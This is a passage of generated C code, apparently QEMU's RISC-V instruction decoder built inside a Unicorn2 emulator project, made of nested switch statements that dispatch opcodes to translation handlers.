/home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:55 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amomin_d(ctx, &u.f_atomic)) return true; return false; case 0xa0002000: /* 10100... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:151 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amomax_w(ctx, &u.f_atomic)) return true; return false; case 0xa0003000: /* 10100... ........ .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:56 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amomax_d(ctx, &u.f_atomic)) return true; return false; case 0xc0002000: /* 11000... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:152 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amominu_w(ctx, &u.f_atomic)) return true; return false; case 0xc0003000: /* 11000... ........ .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:57 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amominu_d(ctx, &u.f_atomic)) return true; return false; case 0xe0002000: /* 11100... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:153 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amomaxu_w(ctx, &u.f_atomic)) return true; return false; case 0xe0003000: /* 11100... ........ .011.... 
.0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:58 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amomaxu_d(ctx, &u.f_atomic)) return true; return false; } return false; case 0x00000033: /* ........ ........ ........ .0110011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch (insn & 0xfe007000) { case 0x00000000: /* 0000000. ........ .000.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:113 */ if (trans_add(ctx, &u.f_r)) return true; return false; case 0x00001000: /* 0000000. ........ .001.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:115 */ if (trans_sll(ctx, &u.f_r)) return true; return false; case 0x00002000: /* 0000000. ........ .010.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:116 */ if (trans_slt(ctx, &u.f_r)) return true; return false; case 0x00003000: /* 0000000. ........ .011.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:117 */ if (trans_sltu(ctx, &u.f_r)) return true; return false; case 0x00004000: /* 0000000. ........ .100.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:118 */ if (trans_xor(ctx, &u.f_r)) return true; return false; case 0x00005000: /* 0000000. ........ .101.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:119 */ if (trans_srl(ctx, &u.f_r)) return true; return false; case 0x00006000: /* 0000000. ........ .110.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:121 */ if (trans_or(ctx, &u.f_r)) return true; return false; case 0x00007000: /* 0000000. ........ .111.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:122 */ if (trans_and(ctx, &u.f_r)) return true; return false; case 0x02000000: /* 0000001. ........ .000.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:133 */ if (trans_mul(ctx, &u.f_r)) return true; return false; case 0x02001000: /* 0000001. ........ .001.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:134 */ if (trans_mulh(ctx, &u.f_r)) return true; return false; case 0x02002000: /* 0000001. ........ .010.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:135 */ if (trans_mulhsu(ctx, &u.f_r)) return true; return false; case 0x02003000: /* 0000001. ........ .011.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:136 */ if (trans_mulhu(ctx, &u.f_r)) return true; return false; case 0x02004000: /* 0000001. ........ .100.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:137 */ if (trans_div(ctx, &u.f_r)) return true; return false; case 0x02005000: /* 0000001. ........ .101.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:138 */ if (trans_divu(ctx, &u.f_r)) return true; return false; case 0x02006000: /* 0000001. ........ .110.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:139 */ if (trans_rem(ctx, &u.f_r)) return true; return false; case 0x02007000: /* 0000001. ........ .111.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:140 */ if (trans_remu(ctx, &u.f_r)) return true; return false; case 0x40000000: /* 0100000. ........ .000.... 
.0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:114 */ if (trans_sub(ctx, &u.f_r)) return true; return false; case 0x40005000: /* 0100000. ........ .101.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:120 */ if (trans_sra(ctx, &u.f_r)) return true; return false; } return false; case 0x00000037: /* ........ ........ ........ .0110111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:86 */ decode_insn32_extract_u(ctx, &u.f_u, insn); if (trans_lui(ctx, &u.f_u)) return true; return false; case 0x0000003b: /* ........ ........ ........ .0111011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch (insn & 0xfe007000) { case 0x00000000: /* 0000000. ........ .000.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:34 */ if (trans_addw(ctx, &u.f_r)) return true; return false; case 0x00001000: /* 0000000. ........ .001.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:36 */ if (trans_sllw(ctx, &u.f_r)) return true; return false; case 0x00005000: /* 0000000. ........ .101.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:37 */ if (trans_srlw(ctx, &u.f_r)) return true; return false; case 0x02000000: /* 0000001. ........ .000.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:41 */ if (trans_mulw(ctx, &u.f_r)) return true; return false; case 0x02004000: /* 0000001. ........ .100.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:42 */ if (trans_divw(ctx, &u.f_r)) return true; return false; case 0x02005000: /* 0000001. ........ .101.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:43 */ if (trans_divuw(ctx, &u.f_r)) return true; return false; case 0x02006000: /* 0000001. ........ .110.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:44 */ if (trans_remw(ctx, &u.f_r)) return true; return false; case 0x02007000: /* 0000001. ........ .111.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:45 */ if (trans_remuw(ctx, &u.f_r)) return true; return false; case 0x40000000: /* 0100000. ........ .000.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:35 */ if (trans_subw(ctx, &u.f_r)) return true; return false; case 0x40005000: /* 0100000. ........ .101.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:38 */ if (trans_sraw(ctx, &u.f_r)) return true; return false; } return false; case 0x00000043: /* ........ ........ ........ .1000011 */ decode_insn32_extract_r4_rm(ctx, &u.f_decode_insn3210, insn); switch ((insn >> 25) & 0x3) { case 0x0: /* .....00. ........ ........ .1000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:158 */ if (trans_fmadd_s(ctx, &u.f_decode_insn3210)) return true; return false; case 0x1: /* .....01. ........ ........ .1000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:186 */ if (trans_fmadd_d(ctx, &u.f_decode_insn3210)) return true; return false; } return false; case 0x00000047: /* ........ ........ ........ .1000111 */ decode_insn32_extract_r4_rm(ctx, &u.f_decode_insn3210, insn); switch ((insn >> 25) & 0x3) { case 0x0: /* .....00. ........ ........ 
.1000111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:159 */ if (trans_fmsub_s(ctx, &u.f_decode_insn3210)) return true; return false; case 0x1: /* .....01. ........ ........ .1000111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:187 */ if (trans_fmsub_d(ctx, &u.f_decode_insn3210)) return true; return false; } return false; case 0x0000004b: /* ........ ........ ........ .1001011 */ decode_insn32_extract_r4_rm(ctx, &u.f_decode_insn3210, insn); switch ((insn >> 25) & 0x3) { case 0x0: /* .....00. ........ ........ .1001011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:160 */ if (trans_fnmsub_s(ctx, &u.f_decode_insn3210)) return true; return false; case 0x1: /* .....01. ........ ........ .1001011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:188 */ if (trans_fnmsub_d(ctx, &u.f_decode_insn3210)) return true; return false; } return false; case 0x0000004f: /* ........ ........ ........ .1001111 */ decode_insn32_extract_r4_rm(ctx, &u.f_decode_insn3210, insn); switch ((insn >> 25) & 0x3) { case 0x0: /* .....00. ........ ........ .1001111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:161 */ if (trans_fnmadd_s(ctx, &u.f_decode_insn3210)) return true; return false; case 0x1: /* .....01. ........ ........ .1001111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:189 */ if (trans_fnmadd_d(ctx, &u.f_decode_insn3210)) return true; return false; } return false; case 0x00000053: /* ........ ........ ........ .1010011 */ switch ((insn >> 25) & 0x7f) { case 0x0: /* 0000000. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:162 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fadd_s(ctx, &u.f_decode_insn3211)) return true; return false; case 0x1: /* 0000001. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:190 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fadd_d(ctx, &u.f_decode_insn3211)) return true; return false; case 0x4: /* 0000100. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:163 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fsub_s(ctx, &u.f_decode_insn3211)) return true; return false; case 0x5: /* 0000101. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:191 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fsub_d(ctx, &u.f_decode_insn3211)) return true; return false; case 0x8: /* 0001000. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:164 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fmul_s(ctx, &u.f_decode_insn3211)) return true; return false; case 0x9: /* 0001001. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:192 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fmul_d(ctx, &u.f_decode_insn3211)) return true; return false; case 0xc: /* 0001100. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:165 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fdiv_s(ctx, &u.f_decode_insn3211)) return true; return false; case 0xd: /* 0001101. ........ ........ 
.1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:193 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fdiv_d(ctx, &u.f_decode_insn3211)) return true; return false; case 0x10: /* 0010000. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 0010000. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:167 */ if (trans_fsgnj_s(ctx, &u.f_r)) return true; return false; case 0x1: /* 0010000. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:168 */ if (trans_fsgnjn_s(ctx, &u.f_r)) return true; return false; case 0x2: /* 0010000. ........ .010.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:169 */ if (trans_fsgnjx_s(ctx, &u.f_r)) return true; return false; } return false; case 0x11: /* 0010001. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 0010001. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:195 */ if (trans_fsgnj_d(ctx, &u.f_r)) return true; return false; case 0x1: /* 0010001. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:196 */ if (trans_fsgnjn_d(ctx, &u.f_r)) return true; return false; case 0x2: /* 0010001. ........ .010.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:197 */ if (trans_fsgnjx_d(ctx, &u.f_r)) return true; return false; } return false; case 0x14: /* 0010100. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 0010100. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:170 */ if (trans_fmin_s(ctx, &u.f_r)) return true; return false; case 0x1: /* 0010100. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:171 */ if (trans_fmax_s(ctx, &u.f_r)) return true; return false; } return false; case 0x15: /* 0010101. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 0010101. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:198 */ if (trans_fmin_d(ctx, &u.f_r)) return true; return false; case 0x1: /* 0010101. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:199 */ if (trans_fmax_d(ctx, &u.f_r)) return true; return false; } return false; case 0x20: /* 0100000. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x1: /* 01000000 0001.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:200 */ if (trans_fcvt_s_d(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x21: /* 0100001. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 01000010 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:201 */ if (trans_fcvt_d_s(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x2c: /* 0101100. ........ ........ 
.1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 01011000 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:166 */ if (trans_fsqrt_s(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x2d: /* 0101101. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 01011010 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:194 */ if (trans_fsqrt_d(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x50: /* 1010000. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 1010000. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:177 */ if (trans_fle_s(ctx, &u.f_r)) return true; return false; case 0x1: /* 1010000. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:176 */ if (trans_flt_s(ctx, &u.f_r)) return true; return false; case 0x2: /* 1010000. ........ .010.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:175 */ if (trans_feq_s(ctx, &u.f_r)) return true; return false; } return false; case 0x51: /* 1010001. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 1010001. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:204 */ if (trans_fle_d(ctx, &u.f_r)) return true; return false; case 0x1: /* 1010001. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:203 */ if (trans_flt_d(ctx, &u.f_r)) return true; return false; case 0x2: /* 1010001. ........ .010.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:202 */ if (trans_feq_d(ctx, &u.f_r)) return true; return false; } return false; case 0x60: /* 1100000. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 11000000 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:172 */ if (trans_fcvt_w_s(ctx, &u.f_decode_insn3212)) return true; return false; case 0x1: /* 11000000 0001.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:173 */ if (trans_fcvt_wu_s(ctx, &u.f_decode_insn3212)) return true; return false; case 0x2: /* 11000000 0010.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:61 */ if (trans_fcvt_l_s(ctx, &u.f_decode_insn3212)) return true; return false; case 0x3: /* 11000000 0011.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:62 */ if (trans_fcvt_lu_s(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x61: /* 1100001. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 11000010 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:206 */ if (trans_fcvt_w_d(ctx, &u.f_decode_insn3212)) return true; return false; case 0x1: /* 11000010 0001.... ........ 
.1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:207 */ if (trans_fcvt_wu_d(ctx, &u.f_decode_insn3212)) return true; return false; case 0x2: /* 11000010 0010.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:67 */ if (trans_fcvt_l_d(ctx, &u.f_decode_insn3212)) return true; return false; case 0x3: /* 11000010 0011.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:68 */ if (trans_fcvt_lu_d(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x68: /* 1101000. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 11010000 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:179 */ if (trans_fcvt_s_w(ctx, &u.f_decode_insn3212)) return true; return false; case 0x1: /* 11010000 0001.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:180 */ if (trans_fcvt_s_wu(ctx, &u.f_decode_insn3212)) return true; return false; case 0x2: /* 11010000 0010.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:63 */ if (trans_fcvt_s_l(ctx, &u.f_decode_insn3212)) return true; return false; case 0x3: /* 11010000 0011.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:64 */ if (trans_fcvt_s_lu(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x69: /* 1101001. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 11010010 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:208 */ if (trans_fcvt_d_w(ctx, &u.f_decode_insn3212)) return true; return false; case 0x1: /* 11010010 0001.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:209 */ if (trans_fcvt_d_wu(ctx, &u.f_decode_insn3212)) return true; return false; case 0x2: /* 11010010 0010.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:70 */ if (trans_fcvt_d_l(ctx, &u.f_decode_insn3212)) return true; return false; case 0x3: /* 11010010 0011.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:71 */ if (trans_fcvt_d_lu(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x70: /* 1110000. ........ ........ .1010011 */ decode_insn32_extract_r2(ctx, &u.f_decode_insn3213, insn); switch (insn & 0x01f07000) { case 0x00000000: /* 11100000 0000.... .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:174 */ if (trans_fmv_x_w(ctx, &u.f_decode_insn3213)) return true; return false; case 0x00001000: /* 11100000 0000.... .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:178 */ if (trans_fclass_s(ctx, &u.f_decode_insn3213)) return true; return false; } return false; case 0x71: /* 1110001. ........ ........ .1010011 */ decode_insn32_extract_r2(ctx, &u.f_decode_insn3213, insn); switch (insn & 0x01f07000) { case 0x00000000: /* 11100010 0000.... .000.... 
.1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:69 */ if (trans_fmv_x_d(ctx, &u.f_decode_insn3213)) return true; return false; case 0x00001000: /* 11100010 0000.... .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:205 */ if (trans_fclass_d(ctx, &u.f_decode_insn3213)) return true; return false; } return false; case 0x78: /* 1111000. ........ ........ .1010011 */ decode_insn32_extract_r2(ctx, &u.f_decode_insn3213, insn); switch (insn & 0x01f07000) { case 0x00000000: /* 11110000 0000.... .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:181 */ if (trans_fmv_w_x(ctx, &u.f_decode_insn3213)) return true; return false; } return false; case 0x79: /* 1111001. ........ ........ .1010011 */ decode_insn32_extract_r2(ctx, &u.f_decode_insn3213, insn); switch (insn & 0x01f07000) { case 0x00000000: /* 11110010 0000.... .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:72 */ if (trans_fmv_d_x(ctx, &u.f_decode_insn3213)) return true; return false; } return false; } return false; case 0x00000063: /* ........ ........ ........ .1100011 */ decode_insn32_extract_b(ctx, &u.f_b, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:90 */ if (trans_beq(ctx, &u.f_b)) return true; return false; case 0x1: /* ........ ........ .001.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:91 */ if (trans_bne(ctx, &u.f_b)) return true; return false; case 0x4: /* ........ ........ .100.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:92 */ if (trans_blt(ctx, &u.f_b)) return true; return false; case 0x5: /* ........ ........ .101.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:93 */ if (trans_bge(ctx, &u.f_b)) return true; return false; case 0x6: /* ........ ........ .110.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:94 */ if (trans_bltu(ctx, &u.f_b)) return true; return false; case 0x7: /* ........ ........ .111.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:95 */ if (trans_bgeu(ctx, &u.f_b)) return true; return false; } return false; case 0x00000067: /* ........ ........ ........ .1100111 */ decode_insn32_extract_i(ctx, &u.f_i, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .1100111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:89 */ if (trans_jalr(ctx, &u.f_i)) return true; return false; } return false; case 0x0000006f: /* ........ ........ ........ .1101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:88 */ decode_insn32_extract_j(ctx, &u.f_j, insn); if (trans_jal(ctx, &u.f_j)) return true; return false; case 0x00000073: /* ........ ........ ........ .1110011 */ switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .1110011 */ switch (insn & 0xfe000f80) { case 0x00000000: /* 0000000. ........ 
.0000000 01110011 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); switch ((insn >> 15) & 0x3ff) { case 0x0: /* 00000000 00000000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:74 */ if (trans_ecall(ctx, &u.f_empty)) return true; return false; case 0x20: /* 00000000 00010000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:75 */ if (trans_ebreak(ctx, &u.f_empty)) return true; return false; case 0x40: /* 00000000 00100000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:76 */ if (trans_uret(ctx, &u.f_empty)) return true; return false; } return false; case 0x10000000: /* 0001000. ........ .0000000 01110011 */ switch ((insn >> 20) & 0x1f) { case 0x2: /* 00010000 0010.... .0000000 01110011 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); switch ((insn >> 15) & 0x1f) { case 0x0: /* 00010000 00100000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:77 */ if (trans_sret(ctx, &u.f_empty)) return true; return false; } return false; case 0x4: /* 00010000 0100.... .0000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:83 */ decode_insn32_extract_sfence_vm(ctx, &u.f_decode_insn3215, insn); if (trans_sfence_vm(ctx, &u.f_decode_insn3215)) return true; return false; case 0x5: /* 00010000 0101.... .0000000 01110011 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); switch ((insn >> 15) & 0x1f) { case 0x0: /* 00010000 01010000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:79 */ if (trans_wfi(ctx, &u.f_empty)) return true; return false; } return false; } return false; case 0x12000000: /* 0001001. ........ .0000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:82 */ decode_insn32_extract_sfence_vma(ctx, &u.f_decode_insn3214, insn); if (trans_sfence_vma(ctx, &u.f_decode_insn3214)) return true; return false; case 0x22000000: /* 0010001. ........ .0000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:81 */ decode_insn32_extract_hfence_bvma(ctx, &u.f_decode_insn3214, insn); if (trans_hfence_bvma(ctx, &u.f_decode_insn3214)) return true; return false; case 0x30000000: /* 0011000. ........ .0000000 01110011 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); switch ((insn >> 15) & 0x3ff) { case 0x40: /* 00110000 00100000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:78 */ if (trans_mret(ctx, &u.f_empty)) return true; return false; } return false; case 0x62000000: /* 0110001. ........ .0000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:80 */ decode_insn32_extract_hfence_gvma(ctx, &u.f_decode_insn3214, insn); if (trans_hfence_gvma(ctx, 